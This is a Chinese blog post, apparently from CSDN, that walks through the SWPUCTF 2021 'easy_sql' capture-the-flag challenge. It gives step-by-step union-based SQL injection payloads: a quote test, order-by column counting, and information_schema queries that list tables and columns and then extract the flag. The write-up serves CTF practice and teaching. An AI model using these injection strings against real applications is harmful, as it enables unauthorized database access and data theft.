SWPUCTF 2021 新生赛]easy_sql

本文讲述了作者通过分析源代码发现的字符型漏洞,逐步进行SQL注入攻击,测试并获取了数据库中的表名、字段名和敏感信息的过程,展示了如何利用技术手段进行安全评估。
摘要由CSDN通过智能技术生成

1.f12打开源代码,发现要求我们传的参数是wllm2.首先输入?wllm=1,出现以下界面,说明回显正常输入?wllm=1' ,出现报错,说明为字符型漏洞

分别输入

  ?wllm=1’ order by 3--+?wllm=1’ order by 4--+

发现不存在4列,存在3列

输入?wllm=-1' union select 1,2,3--+查看回显输入?wllm=-1' union select 1,2,database()--+

输入?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

查看test_db的表

输入?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

查字段

输入 -1' union select 1,2,group_concat(id,flag) from test_tb--+ 

查看flag的字段,得到密码。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值